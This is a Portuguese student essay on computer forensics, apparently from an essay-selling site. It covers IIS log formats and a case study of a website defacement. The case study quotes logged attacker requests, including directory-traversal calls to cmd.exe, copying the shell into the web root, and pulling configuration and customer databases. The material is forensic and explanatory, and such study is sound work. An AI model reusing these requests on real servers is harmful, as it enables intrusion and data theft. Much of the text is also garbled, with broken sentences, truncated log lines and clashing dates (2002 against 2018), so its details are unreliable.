Perícia Forense Aplicada à Informática

Tipo de documento:Redação

Área de estudo:Lingua Portuguesa

Documento 1

Índice Sumário Introdução. Capítulo 1 - Perícia Forense. Perícia Forense Aplicada a Redes. Análise Pericial. Análise Física. Capítulo 3 - Investigando Servidores Web. Microsoft IIS (Internet Information Server). W3C Extended Log File Format. Definições do Log do W3C Extended Log File Format. Definições de Log de Contabilização de Processos. Conclusão. Bibliografia. Anexos. Anexo 1 - Como Saber que Houve uma Invasão. Anexo 2 - Definições dos Códigos de Status do HTTP. A história inteira de um crime pode ser contada com a recuperação de um arquivo que pensaram ter sido apagado. Capítulo 1 – Perícia Forense Da mesma maneira que com outras ciências forenses, os profissionais da lei estão reconhecendo que a Perícia Forense pode prover evidência extremamente importante para solucionar um crime.

Como é colocada uma maior ênfase em evidência digital, se tornará crescentemente crítico que a evidência seja controlada e examinada corretamente. Perícia Forense em Sistemas Computacionais é o processo de coleta, recuperação , análise e correlacionamento de dados que visa, dentro do possível, reconstruir o curso das ações e recriar cenários completos fidedignos. Perícia Forense Aplicada a Redes No Manual de Patologia Forense do Colégio de Patologistas Americanos (1990), a ciência forense é definida como “a aplicação de princípios das ciências físicas ao direito na busca da verdade em questões cíveis, criminais e de comportamento social para que não se cometam injustiças contra qualquer membro da sociedade”. Com freqüência , se faz pesquisas de seqüências para produzir listas de dados.

essas listas são úteis nas fases posteriores da investigação. Entre as listas geradas estão as seguintes : Todos os URLs encontrados na mídia. Todos os endereços de e-mail encontrados na mídia. Todas as ocorrências de pesquisa de seqüência com palavras sensíveis a caixa alta e baixa. Isto é muito útil quando se está extraindo dados brutos de uma imagem pericial. Esta capacidade de extração forçada de arquivos é incrivelmente útil em sistemas de arquivos danificados ou quando os utilitários comuns de recuperação de arquivos apagados são ineficientes ou falham completamente. Extraindo Espaço Subaproveitado e Livre de Arquivos Até certo ponto, todos os sistemas de arquivos têm resíduos. Os tipos de resíduo se enquadram em duas categorias : espaço livre, ou não-alocado, e espaço subaproveitado.

O espaço livre é qualquer informação encontrada em um disco rígido que no momento não esteja alocada em um arquivo. O investigador precisa estar ciente de todas as medidas tomadas na imagem restaurada. É por isto que quase nunca se usa diretamente sistemas operacionais mais convenientes, como o Windows XP/7/8/10. Mais uma vez, o objetivo básico é proteger as provas contra alterações. Montar ou acessar a imagem restaurada a partir de um sistema operacional que entenda nativamente o formato do sistema de arquivos é muito arriscado, pois normalmente o processo de montagem não é documentado, não está à disposição do publico e não pode ser verificado. A imagem restaurada precisa ser protegida e é por isso que se monta cada partição em Linux, em modo somente leitura.

O desafio é encontrar a ferramenta certa para extrair as informações. A tabela 1 mostra as relações entre setores, clusters, partições e arquivos. Isso ajuda a determinar o tipo de ferramenta a ser usada para extrair as informações. Cada camada do sistema de arquivos tem um fim definido, para o sistema operacional ou para o hardware do computador. Camada do sistema de Localização de provas em Localização de provas em arquivos DOS ou Windows Linux Armazenamento de aplicativos Arquivos Arquivos Classificação de informações Diretórios e pastas Diretórios Alocação de espaço de FAT Inode e bitmaps de dados armazenamento Formato de blocos Clusters Blocos Classificação de dados Partições Partições Física Setores absolutos ou C/H/S Setores absolutos Tabela 1: Camadas de armazenamento do sistema de arquivos Capítulo 2 - Perícia Forense para Obtenção de Evidências Diariamente há diversos tipos de casos de fraudes e crimes (Cyber Crimes), onde o meio eletrônico foi em algum momento utilizado para este fim.

Apresentação Tecnicamente chamada de “substanciação da evidência”, ela consiste no enquadramento das evidências dentro do formato jurídico como o caso será ou poderá ser tratado. Os advogados de cada uma das partes ou mesmo o juiz do caso poderão enquadrá-lo na esfera civil ou criminal ou mesmo em ambas. Desta forma, quando se tem a certeza material das evidências, atua-se em conjunto com uma das partes acima descritas para a apresentação das mesmas. Capítulo 3 - Investigando Servidores Web Os ataques com base em Web geralmente se encaixam em três (3) categorias: ataques contra o próprio servidor (um pedido de acesso), ataques contra o conteúdo (desfiguração do site/defacement) e ataques contra a empresa ou organização (roubo de produto ou informação).

Os ataques via Web são freqüentes devido à vulnerabilidade no software e autenticação do sistema operacional e os mais comuns são os de desfiguração de site. Ao investigar arquivos de log, as informações são armazenadas de uma forma legível e simples. Os campos importantes para investigar incidentes suspeitos incluem o registro data/hora, endereço IP de origem, código do status do HTTP e recurso requisitado. No IIS, o arquivo de log padrão está localizado no diretório C:\WINNT\System32\Logfiles\W3SVC1 e o nome do log é baseado na data atual, no formato exaammdd. log, por exemplo: ex020327. log. GET /default. asp 200 HTTP/1. A entrada anterior indica que no dia 27 de janeiro de 2018 às 17:42, UTC, um usuário com a versão 1.

do HTTP e o endereço IP 172. emitiu um comando GET do HTTP para o arquivo Default. Isso não inclui usuários anônimos, representados por um hífen. O serviço de Internet e o número da instância executados no computador cliente. s-ip cs-method Tronco URI Consulta URI Status do Http Status do cs-uri-stem cs-uri-query sc-status sc-win32-status s-sitename s-computername Nome do servidor em que a entrada de log foi gerada. Endereço IP do servidor em que a entrada de log foi gerada. Ação que o cliente estava tentando executar (por exemplo, um método GET). No caso do HTTP, será HTTP 1. ou HTTP 1. Navegador utilizado no cliente. cs(user-agent) cs(cookie) cs(referer) Conteúdo do cookie enviado ou recebido, se houver. Site anterior visitado pelo usuário.

s-activeprocs Valor Significado Site-Stop Site da Web parado por algum motivo. Site-Start Site da Web iniciado ou reiniciado. Site-Pause Pausa no site da Web. Periodic-Log Entrada de log definida regularmente, cujo intervalo foi especificado pelo administrador. Interval-Start Intervalo de redefinição iniciado. Site-Pause-Limit-Reset O Intervalo de redefinição foi alcançado ou o Site-Pause-Limit foi redefinido manualmente. De todos os campos que podem ser encontrados nos arquivos de logs, o HTTP Status (sc-status) requer alguma explicação. Em geral, qualquer código entre 200 e 299 indica sucesso, os códigos entre 300 e 399 indicam ações que precisam ser tomadas pelo cliente para cumprir um pedido. Códigos entre 400 e 499 e entre 500 e 599 indicam erros do cliente e servidor, respectivamente. Microsoft IIS Log File Format O formato do arquivo de log do Microsoft IIS é um formato ASCII fixo (não personalizável).

O exemplo é apresentado em duas tabelas devido às limitações de largura da página. Endereço IP do usuário Nome de usuário Data Hora Serviço e instância Nome do computador Endereço IP do servidor 192. — 01/27/2018 7:55:20 W3SVC2 VENDAS1 172. Tempo Bytes Bytes gasto recebidos enviados 4502 163 3223 Código de status de serviço Código de status do Windows 2000 Tipo de solicitação Destino da operação 200 0 GET DeptLogo. gif No exemplo, a primeira entrada indica que um usuário anônimo com o endereço IP 192. dll?http/serv HTTP/1. Observação : Na entrada anterior, o segundo campo (que deveria mostrar o nome de log remoto do usuário) está vazio e é representado por um hífen após o endereço IP 172. O exemplo de entrada anterior é interpretado nas tabelas a seguir.

O exemplo é apresentado em duas tabelas devido às limitações de largura da página. Nome do host remoto Nome de usuário Data Horário e desvio de GMT 172. Nomes de Arquivos de Log Os nomes de arquivos de log usam várias das primeiras letras para representar o formato de log e os números restantes para representar o intervalo de tempo ou a seqüência do log. As letras em itálico representam dígitos: nn para os dígitos seqüenciais, yy para o ano, mm para o mês, ww para a semana do mês, dd para o dia, hh para o horário no formato de 24 horas (ou seja, 17 corresponde a 5:00 P. M. Formato Formato de log do Microsoft IIS Formato de arquivo de log comum do NCSA Formato de arquivo de log estendido do W3C Critério para novos logs Por tamanho do arquivo Por hora Diariamente Semanalmente Mensalmente Por tamanho do arquivo Por hora Diariamente Semanalmente Mensalmente Por tamanho do arquivo Por hora Diariamente Semanalmente Mensalmente Padrão de nome de arquivo inetsvnn.

log inyymmddhh. log exyymmdd. log exyymmww. log exyymm. log Análise de um Sistema Comprometido Após ter sido apresentado como são os formatos dos arquivos de logs do servidor Web IIS da Microsoft e suas características, inicia-se agora um estudo de caso em que uma grande empresa teve seu site Web desfigurado (defacement). Será demonstrado como o hacker entrou no sistema, de onde vem o ataque e qual foi a alteração ocorrida no sistema. Para examinar a total funcionalidade do site, o invasor espelha o site, copiando cada página para examiná-las em detalhes off-line. Para o IIS, essa atividade deve aparecer como muitos pedidos do mesmo IP de origem durante um curto período de tempo : 2018-01-25 2018-01-25 2018-01-25 2018-01-25 2018-01-25 2018-01-25 2018-01-25 2018-01-25 12:26:13 12:26:14 12:26:15 12:26:15 12:26:15 12:26:16 12:26:16 12:26:17 200.

GET GET GET GET GET GET GET GET / 401 /Default. asp 200 /principal. asp 200 /img/logo1. GET /scripts/. winnt/system32/cmd. exe 401 2002-03-26 22:03:35 200. GET /scripts/. winnt/system32/cmd. exe /c+dir. GET /scripts/. winnt/system32/cmd. exe?/c+dir+c: 500 2018-01-26 22:03:52 200. GET /scripts/. winnt/system32/cmd. exe?/c+dir 500 2018-01-26 22:04:03 200. GET /scripts/. winnt/system32/cmd. exe?/c+dir 500 2018-01-26 22:04:04 200. winnt/system32/cmd. exe?/c+dir 500 2018-01-26 22:04:08 200. GET /scripts/. o. winnt/system32/cmd. GET /scripts/. winnt/system32/cmd. exe?/c+dir 500 2018-01-26 22:04:15 200. GET /msadc/. winnt/system32/cmd. GET /_vti_bin/. winnt/system32/cmd. exe?/c+dir 500 Observe também as datas das varreduras em busca de vulnerabilidades, 26 de janeiro, o dia anterior ao ataque. Agora já se consegue montar a primeira parte da história. O hacker primeiro espelha o site da empresa para possíveis estudos (25/01/2018) e depois varre o servidor para determinar se era vulnerável a alguma exploração (26/01/2018).

O Ataque Com a descoberta da vulnerabilidade no dia anterior, o Hacker começa a explorar o servidor em busca de informações, o primeiro registro encontrado no dia 27/01 é uma listagem no diretório c:\winnt\system32 às 03:23:51, o mesmo tipo de registro encontrado anteriormente. Registro da ocorrência: 2018-01-27 03:23:51 200. GET /scripts/. c0%9v. winnt/system32/cmd. accwiz. exe 61. acelpdec. ax 23/01/2017 22:00 15/12/2017 <DIR> Config 13:34. arquivo(s) 258. c0%9v. winnt/system32/cmd. exe?/c+dir+c:\inetpub\wwwroot 200 Resposta obtida: Pasta de c:\inetpub\wwwroot 15/01/2017 15/01/2017 17:10 <DIR>. DIR>. arquivo(s) 0 bytes 2 pasta(s) 1. e descobre onde está o site da empresa, no diretório Sites. Registro da ocorrência: 2018-01-27 03:28:11 200. GET /scripts/. c0%9v. winnt/system32/cmd. Registro da ocorrência: 2018-01-27 03:30:22 200. GET /scripts/. c0%9v. winnt/system32/cmd. exe?/c+copy+c:\winnt\system32\cmd.

asp+>+pagamento. doc 200 2018-01-27 03:34:33 200. GET /pagamento. doc 200 Cria também uma cópia do arquivo Global. asa e visualiza o arquivo. GET /cmd. exe?/c+type+global. asa+>+global. doc 200 2018-01-27 03:33:25 200. GET /global. Financeiro. mdb 224. bytes Total de arquivos na lista: 2 arquivo(s) 224. bytes 0 pasta(s) 1. bytes disponíveis Pasta de C:\Sites\Base 14/06/2017 15:10 1 arquivo(s) 440 clientes. mdb 200 200. GET /sites/base/clientes. mdb 200 200. GET /sites/base/financeiro. mdb 200 63. GET /sites/cmd1. exe /c+dir+/S+*. pdf 200 2018-01-27 03:40:02 200. GET /sites/cmd1. exe /c+dir+/S+*. txt 200 Dentro do diretório repair do Windows encontram-se arquivos importantes para a recuperação do sistema em caso de falha, um deles é o sam. Através de um software específico (L0pht Crack) é possível o Hacker saber as senhas dos usuários do sistema operacional inclusive a senha do Administrador.

Registro da ocorrência: 2018-01-27 03:44:45 200. GET /sites/cmd. exe/c+dir+c:\winnt\repair\ 200 Resposta obtida: Pasta de c:\winnt\repair 15/05/2017 15/05/2017 23/01/2016 25/08/2017 15/05/2017 10/03/2018 15/05/2017 15/05/2017 15/05/2017 15/05/2017 15/05/2017 16:51 16:51 22:00 13:50 16:35 14:55 16:51 16:55 16:48 16:55 16:55 <DIR> <DIR> 515 2. Registro da ocorrência: 2018-01-27 04:03:39 200. GET /sites/cmd1. exe?/c+dir+>+teste. zen 502 (dir / S) Copia o arquivo TFTP do diretório c:\winnt\system32 para dentro do site e tenta se comunicar com sua máquina (provavelmente tenta copiar algum backdoor para o servidor) mas o resultado foi negativo. Registros da ocorrência: 2018-01-27 04:05:27 200. htm 200 2018-01-27 04:07:33 200. GET /sites/default. htm 200 Após alterar a página principal do Web site, o Hacker procura pelos arquivos de Log para poder excluí-los e apagar por definitivo seus rastros, felizmente os arquivos não estão em seu diretório padrão c:\winnt\system32\LogFiles\W3SVC1 Registro da ocorrência: 2018-01-27 04:09:13 200.

GET /sites/cmd. exe?/c+dir+/S+c:\*W3SVC* 200 Resposta obtida: Pasta de c:\WINNT\ServicePackFiles\i386 19/07/2017 05:34 1 arquivo(s) 348. DIR>. arquivo(s) 0 bytes 2 pasta(s) 1. bytes disponíveis A última ocorrência encontrada do invasor foi às 04:09:33 do dia 27/03/2002. Outros Tipos de Ocorrências Encontradas nos Arquivos de Log Quando se analisam os arquivos de log de um servidor Web, muitas informações interessantes poderão ser encontradas, não apenas ataques Hackers ou Scans direcionados ao servidor, mas também erros de programação, tentativas de serviços não autorizados, ataques de vírus e worms, etc. Seguem algumas ocorrências encontradas nos logs do servidor: Tentativa de ataque do Worm Code Red. vitimadoataque. com. br:6667 405 Página desenvolvida em PHP não encontrada em um servidor Microsoft IIS onde todos os sistemas são desenvolvidos em ASP.

Registro da ocorrência: 2018-01-25 13:02:42 200. GET /default. GET /sites/siteseguro/email. asp |637|800a03f9|'Then'_esperado 500 2018-01-27 17:44:47 192. GET /sites/pagamentos/xml. asp |10|80004005|A_folha_de_estilos_não_contém_um_elemento_de_documento. Ela_pode_ estar_vazia_ou_não_ser_um_documento_XML_bem_formado. asp? crypt=e%87z%93%BA%97%D0%B3Z%7B%8B%95%B3%B9%A6%9C%86%95%84x%8A%8Bx%A1%A8l%BC%BD %B2 200 Descobrimos na análise, um outro tipo de ataque que estava ocorrendo no Web Site da empresa, um ataque de difícil percepção e ocasionada por erros de desenvolvimento, denominado “ataque a nível de aplicativo”. Abaixo apresentamos uma seqüência do funcionamento normal do sistema. Registros da ocorrência: 2018-01-26 2018-01-26 2018-01-26 2018-01-26 2018-01-26 2018-01-26 20:33:57 20:34:04 20:34:21 20:34:24 20:35:27 20:37:22 192.

GET /Default. asp 200 GET /principal. asp 200 POST /projetos/consulta. asp 200 GET /projetos/resposta. asp 200 GET /projetos/grafico. asp 200 GET /projetos/extrato. asp?Codigo=24552 GET /projetos/extrato. Não poder usar a informação coletada perante o juiz é pior do que não ter uma prova. O campo da Perícia Forense aplicada em Sistemas Computacionais continuará a crescer e começaremos a ver empresas com os detetives digitais treinados na equipe de funcionários, a combater não somente ameaças externas e internas mas também a analisar e preparar procedimentos e aplicações protetoras para a empresa. Bibliografia » Stephen Northcutt, Mark Cooper, Mat Fearnow, Karen Frederick : “Intrusion Signatures and Analysis”, Editora Sans Giac, New Riders, 2001, Indianápolis, Indiana, EUA. » Stephen Northcutt : “Como detectar invasão em rede – um guia para analistas”, Editora Ciência Moderna, 2000, Rio de Janeiro, RJ, Brasil.

» Joel Scambray, Stuart McLure, George Kurtz: “Hackers Expostos – Segredos e Soluções para a Segurança de Redes”, 2a Edição, Editora Makron Books, 2001, São Paulo, SP, Brasil. » Microsoft Press, Jerry Honeycutt: “Introdução ao Microsoft Windows 2000 Professional”, Editora Campus, 1999, Rio de Janeiro, RJ, Brasil. » Sean Deuby: “Windows 2000 Server – Planejamento e Migração”, Editora Makron Books, 2000, São Paulo, SP, Brasil. » David McMahon: “Ameaça cibernética”, Editora Market Books, 2001, São Paulo, SP, Brasil. » Hacking Spyman: “Manual completo do Hacker”, Editora Book Express, 2001, Rio de Janeiro, RJ, Brasil. Anexos Anexo 1 Como Saber que Houve uma Invasão Quanto mais sofisticado for o hacker, menos probabilidades terá de saber que uma máquina está comprometida. Interfaces de rede promíscuas : Se os invasores quiserem farejar qualquer uma das redes disponíveis no computador, colocarão a interface no modo promíscuo (que captura todos os pacotes).

Arquivos de registro (log) excluídos/truncados : Hackers experientes removerão as linhas individuais dos arquivos de registro que mostrem seu acesso indevido ao sistema. Um hacker iniciante pode, em vez disso, simplesmente excluir inteiramente os registros. Qualquer arquivo de registro que apresentar falta de períodos de tempo ou for apagado de maneira suspeita pode ter sido adulterado. Arquivos utmp/wtmp danificados (Linux) : Os hackers podem eliminar suas entradas de login dos arquivos utmp e wtmp (programas como o zap, wipe e vanish2 fazem isso rapidamente) ou apagar os próprios arquivos para ocultar o fato de que se conectaram. O ambiente simplesmente parece estranho : A maioria das invasões que são descobertas começa quando o administrador acha que algo está errado e inicia uma busca. Às vezes, isso conduz a problemas que não estão relacionados a invasões, como uma falha no disco, memória defeituosa ou alterações não anunciadas na rede.

Anexo 2 Definições dos Códigos de Status do HTTP Informativo (1xx) Utilizado para enviar informações para o cliente. Continuar 101 : Troca de protocolos (Switching Protocols) Bem-sucedido (2xx) Indica que a solicitação (request) obteve sucesso. Por exemplo, o código 200 é utilizado para indicar que a página solicitada foi obtida, entendida e aceita com sucesso. Site : http://www. forensics-intl. com Software : SnapBack DatArrest 4. Empresa : Columbia Data Products, Inc. Site : http://www. guidancesoftware. com Software : Linux "dd" 6. Empresa : Red Hat Inc. Site : http://www. redhat.

1201 R$ para obter acesso e baixar trabalho pronto

Apenas no StudyBank

Modelo original

Para download